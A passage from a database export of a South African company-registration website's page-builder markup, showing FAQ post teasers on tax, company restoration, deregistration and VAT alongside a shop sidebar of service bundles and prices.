aria-hidden=\'true\'\n                >Follow</span></a></li>\n			</ul> <!-- .et_pb_counters -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_13\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_29    et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_blog_0 et_hover_enabled et_pb_blog_grid_wrapper\">\n					<div class=\"et_pb_blog_grid clearfix et_pb_bg_layout_light \">\n					\n					\n					<div class=\"et_pb_ajax_pagination_container\">\n						<div class=\"et_pb_salvattore_content\" data-columns>\n			<article id=\"post-369\" class=\"et_pb_post clearfix et_pb_no_thumb post-369 post type-post status-publish format-standard hentry category-faqs\">\n\n			\n												<h6 class=\"entry-title\"><a href=\"https://companyregistration.online/employees-tax-pay-as-you-earn-paye/\">Employees’ Tax [PAY-AS-YOU-EARN (PAYE)]</a></h6>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://companyregistration.online/author/admin-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2/\" title=\"Posts by Imraan Wajoodeen\" rel=\"author\">Imraan Wajoodeen</a></span>  |  <span class=\"published\">Apr 15, 2016</span>  |  <a href=\"https://companyregistration.online/category/faqs/\" rel=\"category tag\">FAQs</a>  </p><div class=\"post-content\"><p> Employees’ Tax refers to the tax required to be deducted by an employer from an employee’s remuneration paid or payable. The process of deducting or withholding tax from remuneration as it is earned by an employee is commonly referred to as PAYE. An...</p>\n</div>			\n			</article> <!-- .et_pb_post -->\n	\n			<article id=\"post-335\" class=\"et_pb_post clearfix et_pb_no_thumb post-335 post type-post status-publish format-standard hentry category-faqs category-maintaning-your-company tag-close-corporation tag-companies tag-faqs tag-reinstatement tag-restoration\">\n\n			\n												<h6 class=\"entry-title\"><a href=\"https://companyregistration.online/restorations/\">Restoration of a Company or Close Corporation</a></h6>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://companyregistration.online/author/shop-manager/\" title=\"Posts by Zainub\" rel=\"author\">Zainub</a></span>  |  <span class=\"published\">Apr 8, 2016</span>  |  <a href=\"https://companyregistration.online/category/faqs/\" rel=\"category tag\">FAQs</a>, <a href=\"https://companyregistration.online/category/faqs/maintaning-your-company/\" rel=\"category tag\">Maintaning your company</a>  </p><div class=\"post-content\"><p>If the company or close corporation was deregistered, can the company or close corporation still be re-instated (restored)? Yes, but only if proved that the entity was holding property or was active at the time of deregistration.  Once a company or close corporation...</p>\n</div>			\n			</article> <!-- .et_pb_post -->\n	\n			<article id=\"post-329\" class=\"et_pb_post clearfix et_pb_no_thumb post-329 post type-post status-publish format-standard hentry category-faqs category-maintaning-your-company tag-annual tag-faqs tag-returns\">\n\n			\n												<h6 class=\"entry-title\"><a href=\"https://companyregistration.online/annual-returns/\">Annual Returns</a></h6>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://companyregistration.online/author/shop-manager/\" title=\"Posts by Zainub\" rel=\"author\">Zainub</a></span>  |  <span class=\"published\">Apr 8, 2016</span>  |  <a href=\"https://companyregistration.online/category/faqs/\" rel=\"category tag\">FAQs</a>, <a href=\"https://companyregistration.online/category/faqs/maintaning-your-company/\" rel=\"category tag\">Maintaning your company</a>  </p><div class=\"post-content\"><p>Will my personal detail as a director or member be disclosed on the annual return? Due to security concerns relating to the disclosure of personal information CIPC has affected the following changes relating to annual returns: Only the first 6 digits of a director’s...</p>\n</div>			\n			</article> <!-- .et_pb_post -->\n	</div><!-- .et_pb_salvattore_content -->\n					</div>\n					</div> <!-- .et_pb_posts --> \n				</div><div class=\"et_pb_button_module_wrapper et_pb_button_8_wrapper et_pb_button_alignment_center et_pb_module \">\n				<a class=\"et_pb_button et_pb_button_8 et_pb_bg_layout_light\" href=\"\">Read More</a>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --></p>\n<span class=\"et_bloom_bottom_trigger\"></span>'),(16664,29011,'_et_pb_truncate_post','<p><div class=\"et_pb_section et_pb_section_8 et_pb_fullwidth_section et_section_regular\">\n				\n				\n				\n				\n					<section class=\"et_pb_module et_pb_fullwidth_header et_pb_fullwidth_header_0 et_hover_enabled et_pb_section_parallax et_pb_bg_layout_dark et_pb_text_align_left\">\n				<span\n						class=\"et_parallax_bg\"\n						style=\"background-image: url(https://companyregistration.online/wp-content/uploads/2018/05/consultant-08.jpg);\"\n					></span>\n				\n				<div class=\"et_pb_fullwidth_header_container left\">\n					<div class=\"header-content-container center\">\n					<div class=\"header-content\">\n						\n						<h1 class=\"et_pb_module_header\">Welcome To</h1>\n						<span class=\"et_pb_fullwidth_header_subhead\">Our Blog</span>\n						<div class=\"et_pb_header_content_wrapper\">The best place to get information about company administration matters</div>\n						\n					</div>\n				</div>\n					\n				</div>\n				<div class=\"et_pb_fullwidth_header_overlay\"></div>\n				<div class=\"et_pb_fullwidth_header_scroll\"><a href=\"#\" class=\"scroll-down-container\">\n					<span class=\"scroll-down et-pb-icon\">;</span>\n					\n					\n				</a></div>\n			</section>\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_9 et_section_regular\">\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_14\">\n				<div class=\"et_pb_column et_pb_column_2_3 et_pb_column_30    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_blog_1 et_animated et_pb_blog_grid_wrapper\">\n					<div class=\"et_pb_blog_grid clearfix et_pb_bg_layout_light  et_pb_text_align_center\">\n					\n					\n					<div class=\"et_pb_ajax_pagination_container\">\n						<div class=\"et_pb_salvattore_content\" data-columns>\n			<article id=\"post-369\" class=\"et_pb_post clearfix et_pb_no_thumb post-369 post type-post status-publish format-standard hentry category-faqs\">\n\n			\n												<h2 class=\"entry-title\"><a href=\"https://companyregistration.online/employees-tax-pay-as-you-earn-paye/\">Employees’ Tax [PAY-AS-YOU-EARN (PAYE)]</a></h2>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://companyregistration.online/author/admin-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2/\" title=\"Posts by Imraan Wajoodeen\" rel=\"author\">Imraan Wajoodeen</a></span>  |  <span class=\"published\">Apr 15, 2016</span>  |  <a href=\"https://companyregistration.online/category/faqs/\" rel=\"category tag\">FAQs</a>  </p><div class=\"post-content\"><p> Employees’ Tax refers to the tax required to be deducted by an employer from an employee’s remuneration paid or payable. The process of deducting or withholding tax from remuneration as it is earned by an employee is commonly referred to as PAYE. An...</p>\n <a href=\"https://companyregistration.online/employees-tax-pay-as-you-earn-paye/\" class=\"more-link\" >read more</a></div>			\n			</article> <!-- .et_pb_post -->\n	\n			<article id=\"post-335\" class=\"et_pb_post clearfix et_pb_no_thumb post-335 post type-post status-publish format-standard hentry category-faqs category-maintaning-your-company tag-close-corporation tag-companies tag-faqs tag-reinstatement tag-restoration\">\n\n			\n												<h2 class=\"entry-title\"><a href=\"https://companyregistration.online/restorations/\">Restoration of a Company or Close Corporation</a></h2>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://companyregistration.online/author/shop-manager/\" title=\"Posts by Zainub\" rel=\"author\">Zainub</a></span>  |  <span class=\"published\">Apr 8, 2016</span>  |  <a href=\"https://companyregistration.online/category/faqs/\" rel=\"category tag\">FAQs</a>, <a href=\"https://companyregistration.online/category/faqs/maintaning-your-company/\" rel=\"category tag\">Maintaning your company</a>  </p><div class=\"post-content\"><p>If the company or close corporation was deregistered, can the company or close corporation still be re-instated (restored)? Yes, but only if proved that the entity was holding property or was active at the time of deregistration.  Once a company or close corporation...</p>\n <a href=\"https://companyregistration.online/restorations/\" class=\"more-link\" >read more</a></div>			\n			</article> <!-- .et_pb_post -->\n	\n			<article id=\"post-329\" class=\"et_pb_post clearfix et_pb_no_thumb post-329 post type-post status-publish format-standard hentry category-faqs category-maintaning-your-company tag-annual tag-faqs tag-returns\">\n\n			\n												<h2 class=\"entry-title\"><a href=\"https://companyregistration.online/annual-returns/\">Annual Returns</a></h2>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://companyregistration.online/author/shop-manager/\" title=\"Posts by Zainub\" rel=\"author\">Zainub</a></span>  |  <span class=\"published\">Apr 8, 2016</span>  |  <a href=\"https://companyregistration.online/category/faqs/\" rel=\"category tag\">FAQs</a>, <a href=\"https://companyregistration.online/category/faqs/maintaning-your-company/\" rel=\"category tag\">Maintaning your company</a>  </p><div class=\"post-content\"><p>Will my personal detail as a director or member be disclosed on the annual return? Due to security concerns relating to the disclosure of personal information CIPC has affected the following changes relating to annual returns: Only the first 6 digits of a director’s...</p>\n <a href=\"https://companyregistration.online/annual-returns/\" class=\"more-link\" >read more</a></div>			\n			</article> <!-- .et_pb_post -->\n	\n			<article id=\"post-324\" class=\"et_pb_post clearfix et_pb_no_thumb post-324 post type-post status-publish format-standard hentry category-maintaning-your-company tag-close-corporations tag-companies tag-deregistration tag-faqs\">\n\n			\n												<h2 class=\"entry-title\"><a href=\"https://companyregistration.online/deregistrations/\">Deregistration of your Company or Close Corporation at CIPC</a></h2>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://companyregistration.online/author/shop-manager/\" title=\"Posts by Zainub\" rel=\"author\">Zainub</a></span>  |  <span class=\"published\">Apr 8, 2016</span>  |  <a href=\"https://companyregistration.online/category/faqs/maintaning-your-company/\" rel=\"category tag\">Maintaning your company</a>  </p><div class=\"post-content\"><p>How do I apply for the de-registration of my company or close corporation? A company or close corporation may be deregistered upon request from the company or close corporation or any other third party, provided that the company or close corporation:- (a)    has...</p>\n <a href=\"https://companyregistration.online/deregistrations/\" class=\"more-link\" >read more</a></div>			\n			</article> <!-- .et_pb_post -->\n	\n			<article id=\"post-322\" class=\"et_pb_post clearfix et_pb_no_thumb post-322 post type-post status-publish format-standard hentry category-maintaning-your-company tag-change tag-end tag-faqs tag-financial tag-year\">\n\n			\n												<h2 class=\"entry-title\"><a href=\"https://companyregistration.online/change-in-financial-year-end/\">Maintaining your company</a></h2>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://companyregistration.online/author/shop-manager/\" title=\"Posts by Zainub\" rel=\"author\">Zainub</a></span>  |  <span class=\"published\">Apr 8, 2016</span>  |  <a href=\"https://companyregistration.online/category/faqs/maintaning-your-company/\" rel=\"category tag\">Maintaning your company</a>  </p><div class=\"post-content\"><p>Can a company apply for a change of its financial year end? Yes.  A company may change its financial year end with CIPC which must comply with the following requirements;- (1)    it must be the first change of the financial year end for a specific year, as  a company...</p>\n <a href=\"https://companyregistration.online/change-in-financial-year-end/\" class=\"more-link\" >read more</a></div>			\n			</article> <!-- .et_pb_post -->\n	\n			<article id=\"post-314\" class=\"et_pb_post clearfix et_pb_no_thumb post-314 post type-post status-publish format-standard hentry category-uncategorized tag-close tag-coporation tag-faqs\">\n\n			\n												<h2 class=\"entry-title\"><a href=\"https://companyregistration.online/close-corporations/\">Close Corporations</a></h2>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://companyregistration.online/author/shop-manager/\" title=\"Posts by Zainub\" rel=\"author\">Zainub</a></span>  |  <span class=\"published\">Apr 8, 2016</span>  |  <a href=\"https://companyregistration.online/category/uncategorized/\" rel=\"category tag\">Uncategorized</a>  </p><div class=\"post-content\"><p>Can I register a new close corporation (CC)? No, after the implementation of the new Companies Act (Act 71 of 2008) no CC can be registered and no conversions from Companies to CCs will be allowed. However, the existing CCs will be maintained. How do I go about making...</p>\n <a href=\"https://companyregistration.online/close-corporations/\" class=\"more-link\" >read more</a></div>			\n			</article> <!-- .et_pb_post -->\n	\n			<article id=\"post-309\" class=\"et_pb_post clearfix et_pb_no_thumb post-309 post type-post status-publish format-standard hentry category-company-registration tag-company tag-faqs tag-registrations\">\n\n			\n												<h2 class=\"entry-title\"><a href=\"https://companyregistration.online/company-registration/\">Company Registration</a></h2>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://companyregistration.online/author/shop-manager/\" title=\"Posts by Zainub\" rel=\"author\">Zainub</a></span>  |  <span class=\"published\">Apr 8, 2016</span>  |  <a href=\"https://companyregistration.online/category/faqs/company-registration/\" rel=\"category tag\">Company Registration</a>  </p><div class=\"post-content\"><p> What are the types of companies that can be registered in terms of the New Companies Act 71, 2008? Private company (Pty) Ltd Public company (Ltd) State-owned company (SOC) External company Personal liability company (Inc) Non-profit company (NPC)   What is...</p>\n <a href=\"https://companyregistration.online/company-registration/\" class=\"more-link\" >read more</a></div>			\n			</article> <!-- .et_pb_post -->\n	\n			<article id=\"post-267\" class=\"et_pb_post clearfix et_pb_no_thumb post-267 post type-post status-publish format-standard hentry category-faqs tag-eme tag-enterprise tag-exempted tag-micro\">\n\n			\n												<h2 class=\"entry-title\"><a href=\"https://companyregistration.online/what-is-exempted-micro-enterprise-eme/\">What is Exempted Micro Enterprise (EME)</a></h2>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://companyregistration.online/author/shop-manager/\" title=\"Posts by Zainub\" rel=\"author\">Zainub</a></span>  |  <span class=\"published\">Apr 6, 2016</span>  |  <a href=\"https://companyregistration.online/category/faqs/\" rel=\"category tag\">FAQs</a>  </p><div class=\"post-content\"><p>Exempted Micro Enterprises (EMEs) are businesses that are exempt from measurement in terms of the DTI\'s codes of Good Practice for BEE. They automatically qualify as 100% contributors towards BEE, this offers small South African businesses the opportunity to grow as a...</p>\n <a href=\"https://companyregistration.online/what-is-exempted-micro-enterprise-eme/\" class=\"more-link\" >read more</a></div>			\n			</article> <!-- .et_pb_post -->\n	\n			<article id=\"post-144\" class=\"et_pb_post clearfix et_pb_no_thumb post-144 post type-post status-publish format-standard hentry category-faqs tag-type-of-company tag-which-company\">\n\n			\n												<h2 class=\"entry-title\"><a href=\"https://companyregistration.online/what-type-of-company-should-i-register/\">Which registration is best suited to my business</a></h2>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://companyregistration.online/author/admin-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2/\" title=\"Posts by Imraan Wajoodeen\" rel=\"author\">Imraan Wajoodeen</a></span>  |  <span class=\"published\">Mar 26, 2016</span>  |  <a href=\"https://companyregistration.online/category/faqs/\" rel=\"category tag\">FAQs</a>  </p><div class=\"post-content\"><p>Which registration is best suited to my business If you wish to run a franchise business, grocery shop, butcher, an owner managed  business with a small number of directors of between 1 and 20, etc you would register a private company. &nbsp; If you wish to register a...</p>\n <a href=\"https://companyregistration.online/what-type-of-company-should-i-register/\" class=\"more-link\" >read more</a></div>			\n			</article> <!-- .et_pb_post -->\n	\n			<article id=\"post-136\" class=\"et_pb_post clearfix et_pb_no_thumb post-136 post type-post status-publish format-standard hentry category-faqs tag-tax-clearance\">\n\n			\n												<h2 class=\"entry-title\"><a href=\"https://companyregistration.online/when-would-you-require-a-tax-clearance-certificate/\">When would you require a Tax Clearance Certificate</a></h2>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://companyregistration.online/author/shop-manager/\" title=\"Posts by Zainub\" rel=\"author\">Zainub</a></span>  |  <span class=\"published\">Mar 22, 2016</span>  |  <a href=\"https://companyregistration.online/category/faqs/\" rel=\"category tag\">FAQs</a>  </p><div class=\"post-content\"><p>• When applying for a tender • In order for you to register on any private or public supplier database •Certain suppliers may require a Tax Clearance Certificate before payment can be made to you. •To deregister the company with CIPC.</p>\n <a href=\"https://companyregistration.online/when-would-you-require-a-tax-clearance-certificate/\" class=\"more-link\" >read more</a></div>			\n			</article> <!-- .et_pb_post -->\n	\n			<article id=\"post-134\" class=\"et_pb_post clearfix et_pb_no_thumb post-134 post type-post status-publish format-standard hentry category-faqs\">\n\n			\n												<h2 class=\"entry-title\"><a href=\"https://companyregistration.online/what-is-the-difference-between-a-tax-clearance-certificate-and-a-letter-of-good-standing-from-wca/\">What is the difference between a Tax Clearance Certificate and a Letter of Good standing from WCA</a></h2>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://companyregistration.online/author/shop-manager/\" title=\"Posts by Zainub\" rel=\"author\">Zainub</a></span>  |  <span class=\"published\">Mar 22, 2016</span>  |  <a href=\"https://companyregistration.online/category/faqs/\" rel=\"category tag\">FAQs</a>  </p><div class=\"post-content\"><p>A Tax Clearance Certificate is used to validate your status as a taxpayer and also to confirm that the individual or business is tax compliant. A letter of Good standing from Workman’s Compensation is used to prove that the business is registered with Department of...</p>\n <a href=\"https://companyregistration.online/what-is-the-difference-between-a-tax-clearance-certificate-and-a-letter-of-good-standing-from-wca/\" class=\"more-link\" >read more</a></div>			\n			</article> <!-- .et_pb_post -->\n	\n			<article id=\"post-132\" class=\"et_pb_post clearfix et_pb_no_thumb post-132 post type-post status-publish format-standard hentry category-faqs\">\n\n			\n												<h2 class=\"entry-title\"><a href=\"https://companyregistration.online/when-does-a-business-become-liable-to-register-for-value-added-tax/\">When does a business become liable to register for Value Added Tax</a></h2>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://companyregistration.online/author/shop-manager/\" title=\"Posts by Zainub\" rel=\"author\">Zainub</a></span>  |  <span class=\"published\">Mar 22, 2016</span>  |  <a href=\"https://companyregistration.online/category/faqs/\" rel=\"category tag\">FAQs</a>  </p><div class=\"post-content\"><p>It is compulsory for a person to register for VAT if the taxable supplies made or to be made is in excess of R1 million in any consecutive twelve month period. A person may also choose to register voluntarily if the taxable supplies made in the past period of twelve...</p>\n <a href=\"https://companyregistration.online/when-does-a-business-become-liable-to-register-for-value-added-tax/\" class=\"more-link\" >read more</a></div>			\n			</article> <!-- .et_pb_post -->\n	</div><!-- .et_pb_salvattore_content --><div class=\"pagination clearfix\">\n	<div class=\"alignleft\"><a href=\"https://companyregistration.online/page/2/?s=posts\" >&laquo; Older Entries</a></div>\n	<div class=\"alignright\"></div>\n</div></div> <!-- .et_pb_posts -->\n					</div>\n					 \n				</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_31    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_sidebar_0 et_pb_widget_area et_pb_bg_layout_light clearfix et_pb_widget_area_left\">\n				\n				\n				<div id=\"woocommerce_widget_cart-2\" class=\"et_pb_widget woocommerce widget_shopping_cart\"><h4 class=\"widgettitle\">Cart</h4><div class=\"hide_cart_widget_if_empty\"><div class=\"widget_shopping_cart_content\"></div></div></div> <!-- end .et_pb_widget --><div id=\"woocommerce_product_search-2\" class=\"et_pb_widget woocommerce widget_product_search\"><h4 class=\"widgettitle\">Product search</h4><form role=\"search\" method=\"get\" class=\"woocommerce-product-search\" action=\"https://companyregistration.online/\">\n	<label class=\"screen-reader-text\" for=\"woocommerce-product-search-field-0\">Search for:</label>\n	<input type=\"search\" id=\"woocommerce-product-search-field-0\" class=\"search-field\" placeholder=\"Search products&hellip;\" value=\"posts\" name=\"s\" />\n	<button type=\"submit\" value=\"Search\">Search</button>\n	<input type=\"hidden\" name=\"post_type\" value=\"product\" />\n</form>\n</div> <!-- end .et_pb_widget --><div id=\"woocommerce_recently_viewed_products-2\" class=\"et_pb_widget woocommerce widget_recently_viewed_products\"><h4 class=\"widgettitle\">Recently Viewed Products</h4><ul class=\"product_list_widget\"><li>\n	\n	<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\">\n		<img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2017/07/BB-Tender-Ready-Box-400x400.gif\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https://companyregistration.online/wp-content/uploads/2017/07/BB-Tender-Ready-Box-400x400.gif 400w, https://companyregistration.online/wp-content/uploads/2017/07/BB-Tender-Ready-Box-100x100.gif 100w, https://companyregistration.online/wp-content/uploads/2017/07/BB-Tender-Ready-Box-150x150.gif 150w\" sizes=\"(max-width: 400px) 100vw, 400px\" />		<span class=\"product-title\">Tender Ready</span>\n	</a>\n\n	\n	<del><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;6,798.00</span></del> <ins><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;4,999.00</span></ins>\n	</li>\n<li>\n	\n	<a href=\"https://companyregistration.online/shop/combo-deals/business-pro/\">\n		<img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2017/07/BB-business-Pro-Box-400x400.gif\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https://companyregistration.online/wp-content/uploads/2017/07/BB-business-Pro-Box-400x400.gif 400w, https://companyregistration.online/wp-content/uploads/2017/07/BB-business-Pro-Box-100x100.gif 100w, https://companyregistration.online/wp-content/uploads/2017/07/BB-business-Pro-Box-150x150.gif 150w\" sizes=\"(max-width: 400px) 100vw, 400px\" />		<span class=\"product-title\">Business Pro</span>\n	</a>\n\n	\n	<del><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;8,298.00</span></del> <ins><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;5,999.00</span></ins>\n	</li>\n<li>\n	\n	<a href=\"https://companyregistration.online/shop/combo-deals/gold-bundle/\">\n		<img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2017/07/BB-Gold-Box-400x400.gif\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https://companyregistration.online/wp-content/uploads/2017/07/BB-Gold-Box-400x400.gif 400w, https://companyregistration.online/wp-content/uploads/2017/07/BB-Gold-Box-100x100.gif 100w, https://companyregistration.online/wp-content/uploads/2017/07/BB-Gold-Box-150x150.gif 150w\" sizes=\"(max-width: 400px) 100vw, 400px\" />		<span class=\"product-title\">Gold Bundle</span>\n	</a>\n\n	\n	<del><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;2,199.00</span></del> <ins><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;1,699.00</span></ins>\n	</li>\n<li>\n	\n	<a href=\"https://companyregistration.online/shop/combo-deals/basic-bundle/\">\n		<img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2017/07/BB-Standard-Box-400x400.gif\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https://companyregistration.online/wp-content/uploads/2017/07/BB-Standard-Box-400x400.gif 400w, https://companyregistration.online/wp-content/uploads/2017/07/BB-Standard-Box-100x100.gif 100w, https://companyregistration.online/wp-content/uploads/2017/07/BB-Standard-Box-150x150.gif 150w\" sizes=\"(max-width: 400px) 100vw, 400px\" />		<span class=\"product-title\">Basic Bundle</span>\n	</a>\n\n	\n	<del><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;1,399.00</span></del> <ins><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;999.00</span></ins>\n	</li>\n<li>\n	\n	<a href=\"https://companyregistration.online/shop/business-tools/what-i-need-to-know-before-i-start-my-business/\">\n		<img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/Free-Report-cover-1-400x400.jpg\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Ebook\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/07/Free-Report-cover-1-400x400.jpg 400w, https://companyregistration.online/wp-content/uploads/2016/07/Free-Report-cover-1-100x100.jpg 100w, https://companyregistration.online/wp-content/uploads/2016/07/Free-Report-cover-1-150x150.jpg 150w\" sizes=\"(max-width: 400px) 100vw, 400px\" />		<span class=\"product-title\">What I need to know before I start my business in SA</span>\n	</a>\n\n	\n	<span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;199.00</span>\n	</li>\n<li>\n	\n	<a href=\"https://companyregistration.online/shop/business-tools/zoho-cloud-accounting-annually/\">\n		<img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2019/05/zoho-Annual-2-600-400x400.gif\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https://companyregistration.online/wp-content/uploads/2019/05/zoho-Annual-2-600-400x400.gif 400w, https://companyregistration.online/wp-content/uploads/2019/05/zoho-Annual-2-600-150x150.gif 150w, https://companyregistration.online/wp-content/uploads/2019/05/zoho-Annual-2-600-300x300.gif 300w, https://companyregistration.online/wp-content/uploads/2019/05/zoho-Annual-2-600-510x510.gif 510w, https://companyregistration.online/wp-content/uploads/2019/05/zoho-Annual-2-600-100x100.gif 100w\" sizes=\"(max-width: 400px) 100vw, 400px\" />		<span class=\"product-title\">Zoho Books Cloud Accounting Annual</span>\n	</a>\n\n	\n	<span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;990.00</span>\n	</li>\n<li>\n	\n	<a href=\"https://companyregistration.online/shop/bee-requirements/bee-affidavit/\">\n		<img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"BEE Affidavit\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" />		<span class=\"product-title\">BEE Affidavit</span>\n	</a>\n\n	\n	<span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;199.00</span>\n	</li>\n<li>\n	\n	<a href=\"https://companyregistration.online/shop/maintaning-our-company/company-and-close-corporations-restorations/\">\n		<img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/04/Restoration-of-Company-1-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Restoration\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/04/Restoration-of-Company-1-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/04/Restoration-of-Company-1-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/04/Restoration-of-Company-1-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/04/Restoration-of-Company-1-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/04/Restoration-of-Company-1-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/04/Restoration-of-Company-1-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/04/Restoration-of-Company-1-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/04/Restoration-of-Company-1.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" />		<span class=\"product-title\">Company and Close Corporations Restorations</span>\n	</a>\n\n	\n	<span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;3,500.00</span>\n	</li>\n<li>\n	\n	<a href=\"https://companyregistration.online/shop/maintaning-our-company/change-in-company-address/\">\n		<img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Change in Address\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" />		<span class=\"product-title\">Change in Company Address</span>\n	</a>\n\n	\n	<span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;450.00</span>\n	</li>\n<li>\n	\n	<a href=\"https://companyregistration.online/shop/maintaning-our-company/change-in-close-corporation-address/\">\n		<img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover-400x400.png\" 